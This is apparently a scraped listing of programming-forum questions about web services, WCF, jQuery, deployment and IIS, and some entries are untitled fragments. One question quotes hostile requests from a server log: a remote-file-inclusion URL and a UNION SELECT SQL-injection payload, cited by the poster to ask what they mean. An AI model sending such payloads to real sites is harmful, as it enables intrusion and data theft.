• Wrap MemoryStream in a using block REST WCF

  I'm learning REST to implement some Services with WCF. I implemented an example with a MemoryStream. Because MemoryStream is Disposable I wrapped it in a using. When I do this I sometimes can see the xml response in the browser (IE8) and sometimes it will just show me the following Errormessage: The download of the specified resource has failed. Error processing resource 'http://localhost:8889/SimpleGetService/'. Why does this occur? When I don't wrap it in a using, I never seem to get the error.

• jquery attribute indexOf

  When I am getting at an attribute onclick of custom(Reporting Services) checkbox it gives me correct result. However when I am trying to use indexOf on that result it says "Object doesn't support this property or method", i.e. this is fine, gives me a long string $('input[id*=CustomCheckBox]').click(function() { alert( $(this).attr("onclick") ); }); But this gives an error(object doesn't support this property or method): $('input[id*=CustomCheckBox]').click(function() { if ($(this).attr("onclick").indexOf("SomeString") > -1 ) { //do some processing here } } What would I need to modify so that indexOf is working properly?

• Reporting. MS Word templates population required

  Application we developed fills MS Word templates with data from Database. Customers require to have ability edit Word templates via MS Word (change style, font, layout e.t.c) with no additional software to be installed and no training. AFAIK, Sql Reporting Services and Crystal Reports can't populate MS Word templates produced in MS Word. So we implemented our custom solution that maps .net classes onto xml-saved MS Word documents. It looks like we declare class MyTemplate { // maps to [age] field declared in ms document straight in the text int Age { get; set; } // maps to table by attributes applied to property (omitted) List<Person> Persons { get; set; } } We also implemented images insertion. Are there any free libraries for this task or may be you use your own MS-word templators in your projects?

• code deployment options

  We've been looking at automating our server and code deployments. We've already decided on puppet for our server configurations, but are looking for a more "push" style tool to use for code deployments. I'm currently looking at either using capistrano or fabric, but I'm not sure what would be the most mature to use? We deploy a number of different services, none of which are currenlty written in rails or django, so we don't mind about language. What would be the best one to build custom deployment scripts? Or have I missed another tool out there? We are also considering git pushing with hooks for deployment, but feel it will be limited/hacky in what we want to achieve with it. Any thoughts or experience would be great to hear. Cheers

• C# COM+ component isn't getting the constructor string

  I've created a COM+ component in C# with a strong name, COM Visible, ProgId, etc... I've then registered the assembly with regasm, and imported it into the COM+ Applications in Component Services. It runs just fine, and loads up the DLL, except that the constructor string that is passed in is always empty. The method signature is protected override void Construct(string constructString), and it is being called before the method on the actual component. In the component details in COM+ Applications, the constructor string is checked and a value is entered. Any help is appreciated.

• Why hasn't anybody started a hosted continuous integration service?

  There's a dozen services that provide hosted version control, hosted ticket tracking, hosted project management, and combinations of all of the above, there's even hosted web-based IDEs. But nobody's yet offered a hosted continuous integration service; at least that I can find. The concept seems simple enough: I register and provide the URL to my source code repository, it grabs my code and builds it via ant/rake/whatever, then runs the suite of tests and some metrics (code coverage, performance, etc.). Is there some prohibitive barrier to entry I'm not considering?

• How to? WCF customBinding over Https

  Hi all, I'm trying to setup a WCF service for internal use, on our external facing web-farm (we dont have a web farm internally, and I need this service to have failover and load-balancing). Requirements: PerSession state, as we need the service to retain variable data for each session. HTTPS. After lots of googling i've read I needed to create a customBinding, which I've done, but not sure if it is correct. Larger message size, as one of the parameters is a byte[] array, which can be a max of 5mb. no requirement to manually edit the client-side app.config. ie, I need the Developer to just add the service reference, and then starts using the object without fiddly changing of app.config. Note: I've previously had this service working under HTTP correctly (using wsHttpBinding). I've also had it working under HTTPS, but it didn't support PerSession state, and lost internal variable values each function call. I'm currently getting this error from the test harness: Could not find default endpoint element that references contract 'AppMonitor.IAppMonitorWcfService' in the ServiceModel client configuration section. This might be because no configuration file was found for your application, or because no endpoint element matching this contract could be found in the client element. NOTE: The error is arising on an Test Harness EXE, that has the WCF service referenced directly under Service References. This is not the problem of an exe referencing another object, that then references the WCF service, that i've read about. The WSDL is showing correctly when browsing to the URL. • Can an application's Service ever run in a different process?

  If an application begins a Service via bindService or startService, will this Service object ever run from a process different from that of the application? I ask because many Android example projects begin a service and communicate to them using IPC which seems wholly unnecessary considering that, according to the Android Service documentation, "... services, like other application objects, run in the main thread of their hosting process." IPC, AIDL, and the IBinder interface only seem useful if connecting to a Service started by an application other than your own. Is this a correct or fair understanding?

  In cPanel's Analog Stats statistics module, I've noticed countless requests to connect to the following example: /?x=19&y=15 The numbers are random, but its always setting x and y variables. Another category of mysterious requests: /?id=http://nic.bupt.edu.cn/media/j1.txt?? There are other attempts at injections in the request log that have straight sql written into them as well. Example: /jobs/jobinfo.php?id=-999.9 UNION ALL SELECT 1,(SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM information_schema.tables WHERE table_schema=0x73636363726F6F745F7075626C6963),3,4,5,6,7,8,9,10,11,12,13-- It looks like they are all reaching a 404, but I'm still wondering about the intent behind these. I know this is vague, but maybe someone knows that this is normal while using cPanel & phpMyAdmin services. Also, there was a search box installed on the site which could be the reason. Any suggestions as to what all these are?

• How to document a Symfony based REST API (similar to enunciate's documentation capabilities)

  If I have a REST based service written in the Symfony [symfony-project.org] framework (i.e. PHP), is there any decent tools/frameworks out there that will parse my code and generate API documentation? The Java based framework enunciate has documentation capabilities similar to what I need, you can view an example of this here: http://enunciate.codehaus.org/wannabecool/step1/index.html. I understand the premise of REST based services are supposed to be self evident, however I was after something that would generate this documentation for me without the need to manually write up all my endpoints, supported formats, sample output etc. Thanks

I know I can duplicate my code to make it work but how to dynamically create the services? Thanks!

I will have case where i'll have multiple Ojbect, so i want to display all of them, how to do that ? for (i=0;i < data.length;i++) Does it look right ? Bonus question : i understand function(data, textStatus, XMLHttpRequest) that in case of success this function is triggered, the data is what the script recieved from his request, but i have no idea what textStatus or XMLHttpRequest are here too and why ?!   Hi, I have a problem with my site in internet explorer. It works fine in firefox, opera etc. Sometimes internet explorer won't show my flash banner. For example when I'm on home page it works fine, but when i press services it doesn't show. Also, when opnend in older versions in IE the page get's completely mixed up. The banner doesn't show and the menu bar gets missplaced. Please help.   We are implementing a warehouse management system atop an open source stack (Java, web services & friends). In this system, we want to integrate many mobile devices which should also be capable of adequate online/offline functionality, e.g. preparing database inserts while a mobile device is temporarily unconnected, and performing them on the backend database when reconnected. For a .NET stack, Microsoft Sync Framework would be a perfect solution, e.g. to do database replication and hoarding. • Sending an SMS myself

  Hi, I'm taking shots in the dark here. I'd like to create a web service where eventually I send an SMS by using my own hardware. I'm not sure what I need in order to send an SMS myself. I don't want to use any of the existing SMS send services out there, I need to be able to send these SMS myself. It looks like there's one opensource project in particular that deals with this, "Kannel": http://www.kannel.org/ what I don't understand is, do I need to get a GSM modem to be able to send SMS? Do SMS gateways (like Kannel) eventually need to get to a GSM modem to send messages, or is there some other hardware you need to be able to actually send the messages? Thanks

• Is SQL Server Compact *ever* OK to use on a web server?

  I'd like to host a personal database for about 500 people (1 database per person) on my web server. A person could possibly share their database with a friend or two. On my web server, I'd have some web services, perhaps for doing synchronization, and maybe even an ASP.NET Web Forms front end to the database. If I restart my IIS web server, would this likely cause database corruptions? Would this be expected to perform ok? If not Compact, should I instead use SQL Express and create a database in SQL Server for each of my 500 people?

What are your experiences? Do you use some form of AOP? Like Springs @Configurable annotation? Load time or build time weawing? Problems you encountered? Do you use manual injection? Then how do you handle different instantiation scenarios (creating of the objects through an library [like Hibernate], creating objects with "new" ...)? Or do you use some other way of injecting the dependencies?

• How to trigger code on two different servers in a WAS cluster?

  I have an administrative page in a web application that resets the cache, but it only resets the cache on the current JVM. The web application is deployed as a cluster to two WAS servers. Any way that I can elegantly have the "clear cache" button on each server trigger the method on both JVMs? Edit: The original developer just wrote a singleton holding a HashMap to be the cache in question. Lightweight and (previously) worked just fine for the requirements. It caches content pulled from six or seven web services for specified amounts of time. Edit: The entire application in question is three pages, so the elegant solution might well be the lightest solution.

• [C#] Running elevated applications on user login with UAC?

  I need to start a program every time the user logs in, but I cannot do this without being met by a UAC dialog asking for permissions for that application. Is there any way to have an application start up on user login without the user having to answer the UAC prompt? I was thinking about running a service, but this would be a last resort. I saw something about an Application Compatibility Toolkit to disable UAC for certain applications, but I feel this is too big of a hassle - even services would be easier to program. I was just wondering if there is an even easier solution I am missing. Thanks in advance.

• Returning EF entities using WCF - Read only web service / public API

  I'm currently migrating an application from Linq-to-SQL & ASP.net Web Services (asmx) to Entity Framework and WCF. My question is, I have a bunch of POCO classes which i have xml mapping files for (for the linq to sql) I've replaced my linq to sql with an entity framework data model I've got an interface - something like IService - that has all the methods on it that i need my service to implement - for example: Product[] GetProductsByKeyword(string keyword); In the above case, Product is a POCO. I now have them as entities within my ef data model - i'm using .net 4, and could take advantage of poco support, but don't really see the need - This service is strictly read only. What's the best way of returning entities in my WCF service? I want it to support other client platforms, not just .net (so php guys could use it)

• Reporting system for organization. Architecture advise required

  We have several legacy & 3'd-party systems in organization that use several RDBMS vendors (& more specific data storages). Cross-system data reporting (as well as extra-reports that are not implemented in 3'd-party systems) is required with charts and population of templates (winword, excel). Reporting system is visioned as intranet web-site with custom user access to reports. We expect ~50 reports per day. Would you suggest to use BizTalk or any other integration software if commercial-department doesn't plan to buy anything expensive. Would you suggest to create centralized data storage for reporting that is populated regularly or rely on on-demand services that providers always up-to-request data. Thank you in advance!

• How to give anonymous access to site in IIS ?

  Hi, I want to give the anonymous access to my deployed site on IIS. i checked in Directory Security by right clicking on site in IIS there is checked the box Enable Anonymous access.also there is user IUSR_MySERVER is there. but still it is asking for user name & pwd. why. I don't want to ask any uname and pwd when site accessing. What to do? please help. I fact my application is, i am importing the Excel sheet from file location in my applicatiom. When i saying browse it run perfect . But when i say Import , it asking for the username and password. on Click of Import button I am reading Excelsheet in datatable by interop services. What should this problem should be?
